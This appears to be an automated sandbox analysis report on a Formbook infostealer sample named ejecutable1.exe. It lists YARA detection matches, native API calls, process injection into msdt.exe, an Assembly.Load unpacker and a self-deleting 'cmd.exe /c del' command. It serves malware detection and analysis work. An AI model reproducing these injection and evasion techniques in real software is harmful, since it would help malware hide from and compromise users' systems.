      Source: 00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000002.00000002.442236058.0000000000360000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000002.00000002.442236058.0000000000360000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000000.00000002.407439949.0000000003431000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000000.00000002.407439949.0000000003431000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000004.00000002.666244346.00000000002B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000004.00000002.666244346.00000000002B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000004.00000002.666299275.00000000002E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000004.00000002.666299275.00000000002E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000003.00000000.433550854.0000000007F73000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000003.00000000.433550854.0000000007F73000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 0_2_002769C90_2_002769C9
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 0_2_00276D300_2_00276D30
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 0_2_002790C00_2_002790C0
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 0_2_002790D00_2_002790D0
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 0_2_0027A44B0_2_0027A44B
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 0_2_00DA67E70_2_00DA67E7
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 0_2_00DA00480_2_00DA0048
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 0_2_00DA5C180_2_00DA5C18
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 0_2_00DA00120_2_00DA0012
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 0_2_00F574470_2_00F57447
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 0_2_002700F00_2_002700F0
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_004010302_2_00401030
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_0041BA852_2_0041BA85
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_0041C2962_2_0041C296
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_0041BBE02_2_0041BBE0
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_00408C6B2_2_00408C6B
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_00408C702_2_00408C70
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_0041C40C2_2_0041C40C
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_0041C4F72_2_0041C4F7
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_0041C55C2_2_0041C55C
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_00402D902_2_00402D90
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_00402FB02_2_00402FB0
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_0089E0C62_2_0089E0C6
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_008CD0052_2_008CD005
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_008A30402_2_008A3040
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_008B905A2_2_008B905A
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_0089E2E92_2_0089E2E9
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_009412382_2_00941238
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_0089F3CF2_2_0089F3CF
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_008C63DB2_2_008C63DB
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_008A23052_2_008A2305
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_008A73532_2_008A7353
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_008EA37B2_2_008EA37B
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_008B14892_2_008B1489
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_008D54852_2_008D5485
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_008BC5F02_2_008BC5F0
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_008A351F2_2_008A351F
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_008A46802_2_008A4680
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_008AE6C12_2_008AE6C1
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_009426222_2_00942622
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_00F574472_2_00F57447
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_026412384_2_02641238
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0259E2E94_2_0259E2E9
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025A73534_2_025A7353
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025EA37B4_2_025EA37B
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025A23054_2_025A2305
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025C63DB4_2_025C63DB
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0259F3CF4_2_0259F3CF
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025B905A4_2_025B905A
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025A30404_2_025A3040
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025CD0054_2_025CD005
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0259E0C64_2_0259E0C6
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_026426224_2_02642622
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025AE6C14_2_025AE6C1
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025A46804_2_025A4680
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025D57C34_2_025D57C3
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025AC7BC4_2_025AC7BC
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0262579A4_2_0262579A
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025B14894_2_025B1489
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025D54854_2_025D5485
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025A351F4_2_025A351F
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025BC5F04_2_025BC5F0
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_02653A834_2_02653A83
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025C7B004_2_025C7B00
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0259FBD74_2_0259FBD7
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0262DBDA4_2_0262DBDA
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0264CBA44_2_0264CBA4
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025AC85C4_2_025AC85C
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025C286D4_2_025C286D
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0263F8EE4_2_0263F8EE
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_026259554_2_02625955
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025B69FE4_2_025B69FE
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025A29B24_2_025A29B2
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0264098E4_2_0264098E
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025BEE4C4_2_025BEE4C
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025D2E2F4_2_025D2E2F
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025CDF7C4_2_025CDF7C
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025B0F3F4_2_025B0F3F
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025ACD5B4_2_025ACD5B
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025D0D3B4_2_025D0D3B
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0263FDDD4_2_0263FDDD
      Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 025E373B appears 238 times
      Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 0260F970 appears 81 times
      Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 0259DF5C appears 107 times
      Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 0259E2A8 appears 38 times
      Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 025E3F92 appears 108 times
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: String function: 0089DF5C appears 50 times
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: String function: 008E3F92 appears 43 times
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: String function: 008E373B appears 81 times
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_004185D0 NtCreateFile,2_2_004185D0
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_00418680 NtReadFile,2_2_00418680
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_00418700 NtClose,2_2_00418700
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_004187B0 NtAllocateVirtualMemory,2_2_004187B0
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_004186FA NtClose,2_2_004186FA
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_004187AA NtAllocateVirtualMemory,2_2_004187AA
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_008900C4 NtCreateFile,LdrInitializeThunk,2_2_008900C4
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_00890048 NtProtectVirtualMemory,LdrInitializeThunk,2_2_00890048
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_00890078 NtResumeThread,LdrInitializeThunk,2_2_00890078
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_008907AC NtCreateMutant,LdrInitializeThunk,2_2_008907AC
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_0088F9F0 NtClose,LdrInitializeThunk,2_2_0088F9F0
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_0088F900 NtReadFile,LdrInitializeThunk,2_2_0088F900
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_0088FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_0088FAD0
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_0088FAE8 NtQueryInformationProcess,LdrInitializeThunk,2_2_0088FAE8
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_0088FBB8 NtQueryInformationToken,LdrInitializeThunk,2_2_0088FBB8
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_0088FB68 NtFreeVirtualMemory,LdrInitializeThunk,2_2_0088FB68
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_0088FC90 NtUnmapViewOfSection,LdrInitializeThunk,2_2_0088FC90
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_0088FC60 NtMapViewOfSection,LdrInitializeThunk,2_2_0088FC60
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_0088FD8C NtDelayExecution,LdrInitializeThunk,2_2_0088FD8C
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_0088FDC0 NtQuerySystemInformation,LdrInitializeThunk,2_2_0088FDC0
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_0088FEA0 NtReadVirtualMemory,LdrInitializeThunk,2_2_0088FEA0
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_0088FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_0088FED0
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_0088FFB4 NtCreateSection,LdrInitializeThunk,2_2_0088FFB4
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_008910D0 NtOpenProcessToken,2_2_008910D0
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_00890060 NtQuerySection,2_2_00890060
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_008901D4 NtSetValueKey,2_2_008901D4
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_0089010C NtOpenDirectoryObject,2_2_0089010C
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_00891148 NtOpenThread,2_2_00891148
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025900C4 NtCreateFile,LdrInitializeThunk,4_2_025900C4
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025907AC NtCreateMutant,LdrInitializeThunk,4_2_025907AC
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0258FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_0258FAD0
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0258FAE8 NtQueryInformationProcess,LdrInitializeThunk,4_2_0258FAE8
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0258FAB8 NtQueryValueKey,LdrInitializeThunk,4_2_0258FAB8
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0258FB50 NtCreateKey,LdrInitializeThunk,4_2_0258FB50
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0258FB68 NtFreeVirtualMemory,LdrInitializeThunk,4_2_0258FB68
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0258FBB8 NtQueryInformationToken,LdrInitializeThunk,4_2_0258FBB8
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0258F900 NtReadFile,LdrInitializeThunk,4_2_0258F900
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0258F9F0 NtClose,LdrInitializeThunk,4_2_0258F9F0
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0258FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_0258FED0
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0258FFB4 NtCreateSection,LdrInitializeThunk,4_2_0258FFB4
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0258FC60 NtMapViewOfSection,LdrInitializeThunk,4_2_0258FC60
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0258FDC0 NtQuerySystemInformation,LdrInitializeThunk,4_2_0258FDC0
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0258FD8C NtDelayExecution,LdrInitializeThunk,4_2_0258FD8C
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_02590048 NtProtectVirtualMemory,4_2_02590048
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_02590078 NtResumeThread,4_2_02590078
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_02590060 NtQuerySection,4_2_02590060
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025910D0 NtOpenProcessToken,4_2_025910D0
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_02591148 NtOpenThread,4_2_02591148
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0259010C NtOpenDirectoryObject,4_2_0259010C
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025901D4 NtSetValueKey,4_2_025901D4
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0258FA50 NtEnumerateValueKey,4_2_0258FA50
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0258FA20 NtQueryInformationFile,4_2_0258FA20
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0258FBE8 NtQueryVirtualMemory,4_2_0258FBE8
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0258F8CC NtWaitForSingleObject,4_2_0258F8CC
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0258F938 NtWriteFile,4_2_0258F938
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_02591930 NtSetContextThread,4_2_02591930
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0258FE24 NtWriteVirtualMemory,4_2_0258FE24
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0258FEA0 NtReadVirtualMemory,4_2_0258FEA0
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0258FF34 NtQueueApcThread,4_2_0258FF34
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0258FFFC NtCreateProcessEx,4_2_0258FFFC
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0258FC48 NtSetInformationFile,4_2_0258FC48
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_02590C40 NtGetContextThread,4_2_02590C40
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0258FC30 NtOpenProcess,4_2_0258FC30
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0258FC90 NtUnmapViewOfSection,4_2_0258FC90
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0258FD5C NtEnumerateKey,4_2_0258FD5C
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_02591D80 NtSuspendThread,4_2_02591D80
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_001185D0 NtCreateFile,4_2_001185D0
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_00118680 NtReadFile,4_2_00118680
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_00118700 NtClose,4_2_00118700
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_001187B0 NtAllocateVirtualMemory,4_2_001187B0
      Source: ejecutable1.exe, 00000000.00000002.406383630.0000000001016000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameIDLFL.exe4 vs ejecutable1.exe
      Source: ejecutable1.exe, 00000000.00000002.406398174.0000000002431000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameColladaLoader.dll4 vs ejecutable1.exe
      Source: ejecutable1.exe, 00000000.00000002.405909286.00000000007A4000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs ejecutable1.exe
      Source: ejecutable1.exe, 00000000.00000002.406092250.0000000000C80000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameCF_Secretaria.dll< vs ejecutable1.exe
      Source: ejecutable1.exe, 00000002.00000002.443196696.0000000001016000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameIDLFL.exe4 vs ejecutable1.exe
      Source: ejecutable1.exe, 00000002.00000003.441170731.00000000028D0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemsdt.exej% vs ejecutable1.exe
      Source: ejecutable1.exe, 00000002.00000002.442687115.0000000000B00000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs ejecutable1.exe
      Source: ejecutable1.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: C:\Users\user\Desktop\ejecutable1.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\ejecutable1.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\ejecutable1.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\ejecutable1.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\msdt.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\msdt.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
      Source: ejecutable1.exeVirustotal: Detection: 36%
      Source: ejecutable1.exeReversingLabs: Detection: 13%
      Source: ejecutable1.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\ejecutable1.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\ejecutable1.exe 'C:\Users\user\Desktop\ejecutable1.exe'
      Source: C:\Users\user\Desktop\ejecutable1.exeProcess created: C:\Users\user\Desktop\ejecutable1.exe C:\Users\user\Desktop\ejecutable1.exe
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
      Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ejecutable1.exe'
      Source: C:\Users\user\Desktop\ejecutable1.exeProcess created: C:\Users\user\Desktop\ejecutable1.exe C:\Users\user\Desktop\ejecutable1.exeJump to behavior
      Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ejecutable1.exe'Jump to behavior
      Source: C:\Users\user\Desktop\ejecutable1.exeFile created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DATJump to behavior
      Source: classification engineClassification label: mal100.troj.evad.winEXE@6/0@11/8
      Source: C:\Users\user\Desktop\ejecutable1.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
      Source: explorer.exe, 00000003.00000000.426550958.0000000002AE0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\ejecutable1.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: ejecutable1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
      Source: ejecutable1.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
      Source: Binary string: wntdll.pdb source: ejecutable1.exe, msdt.exe
      Source: Binary string: msdt.pdb source: ejecutable1.exe, 00000002.00000003.441140636.0000000002880000.00000004.00000001.sdmp

      Data Obfuscation:

      barindex
      .NET source code contains potential unpackerShow sources
      Source: ejecutable1.exe, Darwin.WindowsForm/MainForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 0.0.ejecutable1.exe.f50000.0.unpack, Darwin.WindowsForm/MainForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 0.2.ejecutable1.exe.f50000.3.unpack, Darwin.WindowsForm/MainForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 2.2.ejecutable1.exe.f50000.4.unpack, Darwin.WindowsForm/MainForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 2.0.ejecutable1.exe.f50000.0.unpack, Darwin.WindowsForm/MainForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 0_2_0027EC70 push eax; retn 0027h0_2_0027EC79
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 0_2_00DA44FA push ds; iretd 0_2_00DA44FB
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_0041B87C push eax; ret 2_2_0041B882
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_0041B812 push eax; ret 2_2_0041B818
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_0041B81B push eax; ret 2_2_0041B882
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_00415B53 push ds; ret 2_2_00415B1C
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_00415B1A push ds; ret 2_2_00415B1C
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_00415CE2 push 81CAEFA2h; retf 2_2_00415CE9
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_00415F6D push ss; ret 2_2_00415F74
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_0041B7C5 push eax; ret 2_2_0041B818
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0259DFA1 push ecx; ret 4_2_0259DFB4
